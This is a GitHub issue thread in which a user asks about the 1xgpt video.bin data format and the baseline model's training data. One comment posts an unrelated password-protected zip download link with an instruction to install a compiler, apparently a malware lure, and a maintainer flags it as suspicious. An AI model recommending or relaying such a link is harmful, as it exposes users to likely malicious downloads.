### ISSUE TITLE
Questions about .bin data file and baseline model

### ISSUE THREAD

**Issue by a752994118** [1x-technologies/1xgpt#23]
Hello,

1. I am curious about is the video.bin file just the binary format directly tokenized from the original video? Since I want to convert my custom data to the same format as your team made, can you provide more details about this?

2. Can you give an approximate amount of data your team trained on the baseline model? That would be helpful for me to evaluate my data.

Thank you!

**Comment by SagarChandra07** [comment]
maybe this will help
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file
Pass: changeme
If you don't have the c compliator, install it.(gcc or clang)

**Comment by kev-zhao** [comment]
I hope you did not download that.

For 1, does https://github.com/1x-technologies/1xgpt/issues/8#issuecomment-2218445415 help?

**Comment by a752994118** [comment]
I did not download that :)
Thank you @kev-zhao that is helpful!
